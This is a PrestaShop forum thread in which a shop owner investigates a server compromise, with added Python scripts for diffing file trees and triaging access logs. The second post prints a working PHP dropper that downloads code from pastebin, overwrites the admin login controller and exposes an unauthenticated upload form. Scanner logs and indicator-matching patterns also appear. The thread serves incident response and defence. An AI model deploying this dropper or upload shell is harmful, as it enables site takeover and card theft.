SamPlissken, posted June 2, 2017 (edited):

Hi, I've been warned by my host (Gandi) that one of my servers was sending too many mails with PHP, so they blocked all mail sending with this method (nice of them to warn me only when they block and not before…). I've taken a look at the mail logs and I see things.

Before that, good to know:
- There are 3 websites on the server: one big, one small and recent, one not used.
- All 3 are PrestaShop.

Thanks to the logs, I see a file with a lot of requests, at the root of the PrestaShop installation of the 3 websites: leafpw.php. I can see it on 2 of the 3 websites (the small one and the unused one). I can't find it on the big one, but the logs say it exists… Mystery. It's a file with all the code to be a PHP mail sender: Leaf PHP Mailer by [leafmailer.pw]

As this file has nothing to do here, it's obviously an infection, but by what?
- All the core modules are up to date, and all the ones from addons.prestashop.com too. I've got a few from CodeCanyon, maybe not up to date. Some modules are common to the 3 websites: Presta BackUP v2.4.0 - by presta-apps / Presta Vitesse v4.0.2 - by RSI (via CodeCanyon) / SEO Manager v2.5.0 - by onasus.com / Show email alerts v1.5.0 - by 202-ecommerce
- 2 websites have the same theme (the big one and the unused one).
- PrestaShop is not up to date: 1.6.1.6 for two of them and 1.6.1.7 for the unused website.

So if you have advice or other things, I'm interested. Except updating all I can, I don't know what else to do. I can't find anything on Google about that file in particular. Thanks!

Edit: I also see the 3 websites have a "wp-log.php" file, added at the root at the same time; it looks like a base64-encoded WordPress file. The header says "WSO 2.6". It's the name of an old PHP shell.
SamPlissken, posted June 2, 2017:

Here is what I found in the /modules/ folder:

<?php
echo "hacked by Amine";

// Walk up to five directory levels looking for the PrestaShop admin login controller.
$sss = array('/', '../', '../../', '../../../', '../../../../', '../../../../../');
foreach ($sss as $pa) {
    $p1 = array("$pa/controllers/admin/AdminLoginController.php", "$pa/controllers/AdminLoginController.php");
    foreach ($p1 as $path) {
        if (file_exists("$path")) {
            // Overwrite the real login controller with whatever the attacker's pastebin serves.
            $html = @file_get_contents('https://pastebin.com/raw/43Lwrz3d');
            $save = fopen($path, 'w');
            fwrite($save, $html);
            echo "<br> hous <br>";
            [spam-filter]
        }
    } // closing braces for the two foreach loops were eaten by the forum filter; restored here
}

// ?up=hous exposes a file-upload form; any uploaded file is written next to this script with mode 0644.
if ($_GET['up'] == "hous") {
    echo '<center><font color="Red" size="4">';
    /// Script Upload By amine \\\
    if (isset($_POST['Submit'])) {
        $filedir = "";
        $maxfile = '2000000';
        $mode = '0644';
        $userfile_name = $_FILES['image']['name'];
        $userfile_tmp = $_FILES['image']['tmp_name'];
        if (isset($_FILES['image']['name'])) {
            $qx = $filedir.$userfile_name;
            @move_uploaded_file($userfile_tmp, $qx);
            @chmod($qx, octdec($mode));
            echo "<a href=$userfile_name><center><b>Sucess Upload ==> $userfile_name</b></center></a>";
        }
    } else {
        echo '<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
    }
    echo "<br> greerz all my friend<br>";
    echo '</center></font>';
}
?>
SamPlissken, posted June 6, 2017 (edited):

TL;DR: It was a module, obviously. If you have the same problem, check the Apache logs. Search for multiple GETs and POSTs in a row on the /modules/ folder. At the end of the line, when you don't use the tested module, you will see "404". It's the 404 error: it doesn't exist. If you see "200", it's because they found what they were searching for. Thanks to that, you will know the module(s) they used to hack your server.

If you have a recent backup, replace all your files. If you don't… well, you will have to replace all the core files of PrestaShop manually, check all the module folders to see if there is a new one you don't know (it was my case: they added a fake payment module to steal credit card numbers) and replace all the files with the original ones. Don't miss a thing or they will come back. Patch the modules they used to hack you as soon as you can.

Good luck. And goodbye.
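The clean-up half of the post above (restore every core file, look for module directories you did not install, find the dropped files named in the first post) is easier to do reliably by diffing the suspect tree against a pristine copy than by eye. The script below is an added example, not code from the thread or from PrestaShop: it hashes both trees, reports added, removed and modified files, lists module directories that exist only in the suspect tree, and greps every changed file for the indicators this thread names (Leaf PHP Mailer / leafmailer.pw, the "WSO 2.6" shell header, the "hacked by Amine" dropper and its pastebin fetch) plus a generic eval(base64_decode( pattern. The "clean" tree is assumed to be a fresh download of the same PrestaShop release and the same module versions. The demo file contents, the module path chosen for the dropper and the module name "fakepayment" are constructed placeholders (the thread does not name the fake payment module).

```python
"""Diff a suspect PrestaShop tree against a known-good copy and grep what changed
for the indicators named in this thread.

Added example, not code from the thread. The clean tree is assumed to be a fresh
download of the same PrestaShop release plus the same module versions; the file
contents below are constructed stand-ins, not real PrestaShop or malware sources.
"""
import hashlib
import os
import re
import tempfile

# Strings taken from the thread's own findings, plus one generic obfuscation pattern.
IOC_PATTERNS = {
    "leaf-mailer": re.compile(rb"leafmailer\.pw|Leaf PHP Mailer", re.I),
    "wso-shell": re.compile(rb"WSO 2\.\d"),
    "amine-dropper": re.compile(rb"hacked by Amine|pastebin\.com/raw/"),
    "obfuscated-eval": re.compile(rb"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\("),
}

def build_manifest(root):
    """relative path (forward slashes) -> sha256 of every regular file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            manifest[os.path.relpath(full, root).replace(os.sep, "/")] = digest
    return manifest

def diff_manifest(clean, suspect):
    """Paths only in the suspect tree, only in the clean tree, or in both with different hashes."""
    return {
        "added": sorted(set(suspect) - set(clean)),
        "removed": sorted(set(clean) - set(suspect)),
        "modified": sorted(p for p in set(clean) & set(suspect) if clean[p] != suspect[p]),
    }

def module_dirs(manifest):
    """Names of the directories directly under modules/ that contain at least one file."""
    return {p.split("/")[1] for p in manifest if p.startswith("modules/") and p.count("/") >= 2}

def grep_iocs(root, rel_paths):
    """(path, indicator) for every IOC pattern that matches one of the given files."""
    hits = []
    for rel in rel_paths:
        with open(os.path.join(root, *rel.split("/")), "rb") as fh:
            data = fh.read()
        hits.extend((rel, name) for name, pat in IOC_PATTERNS.items() if pat.search(data))
    return hits

def triage(clean_root, suspect_root):
    """Manifest diff, module directories the clean tree lacks, and IOC hits in changed files."""
    clean, suspect = build_manifest(clean_root), build_manifest(suspect_root)
    report = diff_manifest(clean, suspect)
    report["unknown_modules"] = sorted(module_dirs(suspect) - module_dirs(clean))
    report["ioc_hits"] = grep_iocs(suspect_root, report["added"] + report["modified"])
    return report

# --- constructed demo data (placeholders, not real PrestaShop or malware files) ---
CLEAN_FILES = {
    "index.php": b"<?php require dirname(__FILE__).'/config/config.inc.php';\n",
    "controllers/admin/AdminLoginController.php": b"<?php class AdminLoginControllerCore extends AdminController {}\n",
    "modules/pk_flexmenu/pk_flexmenu.php": b"<?php class Pk_flexmenu extends Module {}\n",
}
# Mirrors what the thread reports: the mailer and the WSO shell at the web root, the
# dropper inside the exploited module (path assumed), an unknown module directory
# ("fakepayment" is a placeholder name) and an overwritten admin login controller.
INFECTED_CHANGES = {
    "leafpw.php": b"<?php /* Leaf PHP Mailer by [leafmailer.pw] */\n",
    "wp-log.php": b"<?php /* WSO 2.6 */ eval(base64_decode('aGVsbG8='));\n",
    "modules/pk_flexmenu/ajax/hous.php": b"<?php echo 'hacked by Amine'; $html=@file_get_contents('https://pastebin.com/raw/REDACTED');\n",
    "modules/fakepayment/fakepayment.php": b"<?php class Fakepayment extends PaymentModule {}\n",
    "controllers/admin/AdminLoginController.php": b"<?php /* replaced by the dropper */\n",
}

def write_tree(root, files):
    for rel, data in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)

def build_demo():
    """Create a clean tree and an infected copy of it under a fresh temp directory."""
    base = tempfile.mkdtemp(prefix="ps-triage-")
    clean, suspect = os.path.join(base, "clean"), os.path.join(base, "suspect")
    write_tree(clean, CLEAN_FILES)
    write_tree(suspect, {**CLEAN_FILES, **INFECTED_CHANGES})
    return clean, suspect

if __name__ == "__main__":
    for key, value in triage(*build_demo()).items():
        print(f"{key}: {value}")
```

On a real incident, point triage() at the unpacked pristine release and the live document root; expect noise from config/settings.inc.php, theme customisations, cache and upload directories, so review the "modified" list rather than restoring it blindly, and treat every entry in "unknown_modules" and "ioc_hits" as something to remove and then explain from the access log.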
DataKick, posted June 7, 2017:

Did you figure out what module, and version, was used as an attack vector?
joseantgv, posted June 7, 2017:

(quoting SamPlissken's post of June 6, 2017, above)

Please give more information. Which module was it?
SamPlissken, posted June 7, 2017:

Yes, of course. They tested a lot of modules, as you can see in the Apache logs:

185.7.214.173 - - [01/Jun/2017:08:58:55 +0000] (0 s) "POST //modules/columnadverts//uploadimage.php HTTP/1.1" 404 87373 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:58:56 +0000] (0 s) "GET ///modules/columnadverts//slides/hous.php?up=shell HTTP/1.1" 404 87401 "-" "-"
185.7.214.173 - - [01/Jun/2017:08:58:56 +0000] (0 s) "POST //modules/soopamobile//uploadimage.php HTTP/1.1" 404 87371 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:58:57 +0000] (0 s) "GET ///modules/soopamobile//slides/hous.php?up=shell HTTP/1.1" 404 87399 "-" "-"
185.7.214.173 - - [01/Jun/2017:08:58:57 +0000] (0 s) "POST //modules/soopabanners//uploadimage.php HTTP/1.1" 404 87372 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:58:58 +0000] (0 s) "GET ///modules/soopabanners//slides/hous.php?up=shell HTTP/1.1" 404 87400 "-" "-"
185.7.214.173 - - [01/Jun/2017:08:59:00 +0000] (0 s) "POST //modules/vtermslideshow//uploadimage.php HTTP/1.1" 404 87374 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:01 +0000] (0 s) "GET ///modules/vtermslideshow//slides/hous.php?up=shell HTTP/1.1" 404 87402 "-" "-"
185.7.214.173 - - [01/Jun/2017:08:59:01 +0000] (0 s) "POST //modules/simpleslideshow//uploadimage.php HTTP/1.1" 404 87375 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:02 +0000] (0 s) "GET ///modules/simpleslideshow//slides/hous.php?up=shell HTTP/1.1" 404 87403 "-" "-"
185.7.214.173 - - [01/Jun/2017:08:59:02 +0000] (0 s) "POST //modules/productpageadverts//uploadimage.php HTTP/1.1" 404 87378 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:03 +0000] (0 s) "GET ///modules/productpageadverts//slides/hous.php?up=shell HTTP/1.1" 404 87406 "-" "-"
185.7.214.173 - - [01/Jun/2017:08:59:03 +0000] (0 s) "POST //modules/homepageadvertise//uploadimage.php HTTP/1.1" 404 87377 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:04 +0000] (0 s) "GET ///modules/homepageadvertise//slides/hous.php?up=shell HTTP/1.1" 404 87405 "-" "-"
185.7.214.173 - - [01/Jun/2017:08:59:05 +0000] (0 s) "POST //modules/homepageadvertise2//uploadimage.php HTTP/1.1" 404 87378 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:06 +0000] (0 s) "GET ///modules/homepageadvertise2//slides/hous.php?up=shell HTTP/1.1" 404 87406 "-" "-"
185.7.214.173 - - [01/Jun/2017:08:59:07 +0000] (0 s) "POST //modules/jro_homepageadvertise//uploadimage.php HTTP/1.1" 404 87381 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:07 +0000] (0 s) "GET ///modules/jro_homepageadvertise//slides/hous.php?up=shell HTTP/1.1" 404 87409 "-" "-"
185.7.214.173 - - [01/Jun/2017:08:59:07 +0000] (0 s) "POST //modules/attributewizardpro//file_upload.php HTTP/1.1" 404 87378 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:08 +0000] (0 s) "POST //modules/1attributewizardpro/file_upload.php HTTP/1.1" 404 87378 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:09 +0000] (0 s) "POST //modules/attributewizardpro.OLD//file_upload.php HTTP/1.1" 404 87382 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:09 +0000] (0 s) "POST //modules//advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php HTTP/1.1" 404 87512 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:10 +0000] (0 s) "POST //modules/cartabandonmentpro/upload.php HTTP/1.1" 404 87372 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:10 +0000] (0 s) "POST //modules/cartabandonmentproOld/upload.php HTTP/1.1" 404 87375 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:11 +0000] (0 s) "POST //modules//videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload HTTP/1.1" 404 87511 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:12 +0000] (0 s) "GET ///modules//advancedslider/uploads/hous.php.png?up=shell HTTP/1.1" 404 87407 "-" "-"
185.7.214.173 - - [01/Jun/2017:08:59:12 +0000] (0 s) "GET ///modules//cartabandonmentpro/uploads/hous.php.png?up=shell HTTP/1.1" 404 87411 "-" "-"
185.7.214.173 - - [01/Jun/2017:08:59:13 +0000] (0 s) "GET ///modules//videostab/uploads/hous.php.mp4?up=shell HTTP/1.1" 404 87402 "-" "-"
185.7.214.173 - - [01/Jun/2017:08:59:13 +0000] (0 s) "GET ///modules//cartabandonmentproOld/uploads/hous.php.png?up=shell HTTP/1.1" 404 87414 "-" "-"
185.7.214.173 - - [01/Jun/2017:08:59:14 +0000] (0 s) "POST //modules//wg24themeadministration/wg24_ajax.php HTTP/1.1" 404 87381 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:14 +0000] (0 s) "POST ///modules//wdoptionpanel/wdoptionpanel_ajax.php HTTP/1.1" 404 87381 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:15 +0000] (0 s) "POST //modules///fieldvmegamenu/ajax/upload.php HTTP/1.1" 404 87375 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:15 +0000] (0 s) "POST //modules///pk_flexmenu//ajax/upload.php HTTP/1.1" 200 - "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:16 +0000] (0 s) "POST //modules///pk_vertflexmenu//ajax/upload.php HTTP/1.1" 200 - "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:16 +0000] (0 s) "POST //modules/nvn_export_orders/upload.php HTTP/1.1" 404 87371 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:18 +0000] (0 s) "POST ///modules/megamenu/uploadify/uploadify.php?id=hous.php HTTP/1.1" 404 87412 "-" "curl/7.49.1"

Most of them are not used by the website, but the last two, pk_flexmenu and pk_vertflexmenu, are. Both of them were patched some time ago.
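The log review SamPlissken describes in the June 6 post (look for bursts of GET/POST requests under /modules/, ignore the 404s, chase the 200s) is a few minutes of work by hand on one burst but not on a month of logs for three shops. The script below is an added example, not code from the thread or from PrestaShop: it parses lines in the format shown above (Apache combined format with Gandi's extra "(N s)" field after the timestamp), normalises the doubled slashes the scanner uses, groups /modules/ requests by client address, flags any client that probed at least five distinct module directories, and lists the requests that were answered 200. The sample log is a constructed subset of the lines posted above plus one benign request from the made-up client 203.0.113.5 for contrast; the threshold of five modules is an assumption you can tune.

```python
"""Triage an Apache access log for PrestaShop /modules/ upload-endpoint scanning.

Added example, not code from the thread. It implements the check SamPlissken
describes: group requests under /modules/ by client, treat a client that probes
many different modules as a scanner, and list the probes that got a 200.
"""
import re
from collections import defaultdict

# Apache combined format as seen in the thread, with the host's extra "(N s)"
# field between the timestamp and the request line; that field is optional here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] (?:\(\d+ s\) )?'
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample: a subset of the lines posted in the thread plus one
# benign request from a made-up client (203.0.113.5) for contrast.
SAMPLE_LOG = """\
185.7.214.173 - - [01/Jun/2017:08:58:55 +0000] (0 s) "POST //modules/columnadverts//uploadimage.php HTTP/1.1" 404 87373 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:58:56 +0000] (0 s) "GET ///modules/columnadverts//slides/hous.php?up=shell HTTP/1.1" 404 87401 "-" "-"
185.7.214.173 - - [01/Jun/2017:08:58:56 +0000] (0 s) "POST //modules/soopamobile//uploadimage.php HTTP/1.1" 404 87371 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:07 +0000] (0 s) "POST //modules/attributewizardpro//file_upload.php HTTP/1.1" 404 87378 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:09 +0000] (0 s) "POST //modules//advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php HTTP/1.1" 404 87512 "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:15 +0000] (0 s) "POST //modules///pk_flexmenu//ajax/upload.php HTTP/1.1" 200 - "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:16 +0000] (0 s) "POST //modules///pk_vertflexmenu//ajax/upload.php HTTP/1.1" 200 - "-" "curl/7.49.1"
185.7.214.173 - - [01/Jun/2017:08:59:18 +0000] (0 s) "POST ///modules/megamenu/uploadify/uploadify.php?id=hous.php HTTP/1.1" 404 87412 "-" "curl/7.49.1"
203.0.113.5 - - [01/Jun/2017:09:02:11 +0000] (0 s) "GET /modules/blockcart/blockcart-ajax.php HTTP/1.1" 200 512 "https://shop.example/" "Mozilla/5.0"
"""

def parse_line(line):
    """Fields of one access-log line as a dict, or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Drop the query string and collapse the doubled slashes the scanner uses, so
    # //modules///pk_flexmenu//ajax/upload.php and /modules/pk_flexmenu/ajax/upload.php
    # compare equal; Apache normally maps both to the same file on disk.
    rec["path"] = re.sub(r"/{2,}", "/", rec["target"].split("?", 1)[0])
    return rec

def module_of(path):
    """Module directory a normalised path points into, or None if not under /modules/."""
    parts = path.split("/")
    if len(parts) >= 3 and parts[1] == "modules" and parts[2]:
        return parts[2]
    return None

def triage(log_text, min_modules=5):
    """Per-client summary of /modules/ requests, restricted to clients that touched
    at least min_modules distinct modules. 'hits' holds every request answered 200,
    i.e. the upload endpoints that actually exist on this install."""
    per_ip = defaultdict(lambda: {"requests": 0, "modules": set(), "hits": []})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        mod = module_of(rec["path"])
        if mod is None:
            continue
        entry = per_ip[rec["ip"]]
        entry["requests"] += 1
        entry["modules"].add(mod)
        if rec["status"] == 200:
            entry["hits"].append((rec["method"], rec["path"], mod))
    return {ip: e for ip, e in per_ip.items() if len(e["modules"]) >= min_modules}

if __name__ == "__main__":
    for ip, e in triage(SAMPLE_LOG).items():
        print(f"{ip}: {e['requests']} requests across {len(e['modules'])} modules")
        for method, path, mod in e["hits"]:
            print(f"  200 on {method} {path}  -> check module '{mod}'")
```

Run it on the real file with triage(open("/var/log/apache2/access.log").read()) or whatever path your host uses. A 200 on a POST to an upload script means the endpoint exists and accepted the request, not yet that the upload succeeded; the confirmation is the follow-up GET for the dropped file (the "hous.php?up=shell" pattern in the lines above) also returning 200, and the file itself being present under that module's upload directory.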
selectshop.at, posted June 8, 2017:

I have been getting these requests for months.... Perhaps you were infected too, but what I see on my server is that there is no new upload and it is sending spam from the PrestaShop contact form. So what I think: bad bots still know how the PrestaShop contact form works and are sending the spam from this file, without needing to infect a server. I blocked the contact form for now and will see if this works, because adding a captcha didn't work either.

What I did: override the ContactController. Create a new file ContactController.php, place it in the folder overrides/controllers/front/ and add the following code:

<?php
class ContactController extends ContactControllerCore
{
    public function init()
    {
        Tools::redirect('pagenotfound'); // redirect contact page to 404 page
    }
}

In this case you disable the contact form. Customers only have the possibility to contact you by mail. The service contact form is disabled. This snippet is not working with all PrestaShop versions. If after clearing the cache it is not working for you, then simply rename the contact form of your theme in use to whatever you want.

BTW: I'm not using the send-to-a-friend module and there is also nowhere a link to the contact form (the contact module for top navigation is disabled as well). The only way to use this form is to log in, so the bad bots are simply using the known link from PrestaShop to use it.

ADD: the spam mails I was receiving myself had the following Received header in common:

Received: from xxxxx.xxxxxx.com (xx.xxx.xx.xxx) by DOMAINNAME OF PRESTASHOP HOSTED ON MY SERVER with SMTP; 7 Jun 2017 20:05:08 +0200

So the mail was sent by PrestaShop project X on my server.
SamPlissken, posted June 14, 2017 (edited):

I haven't seen any weird mails sent in the phpmail log, so I don't think they do that. For now… Thanks for the tips.
trevorgilligan, posted March 2, 2018:

I have this:

/tools/swift/Swift/Plugin/MailSend.php:160]: To:

Is there a way to block users from accessing this file? I still need to have it, I think, as it is the main way PS sends emails?
SamPlissken, posted March 3, 2018:

You have this in the GET/POST list with a code 200? What is your version of PS? Because it's not a plugin, it's a core file of PS. So it's more serious.
TiaNex Shopping, posted March 4, 2018:

The most important thing: you should back up all the data, images and other important files. The hackers can control your server fully; they can even delete all your data. My server data was deleted once for using a WordPress theme with a bug. Please check the server security configuration, replace all PrestaShop system files (you had better upgrade to the latest version of PS 1.6.x or PS 1.7.x) and check for any suspicious modules. Wish you good luck!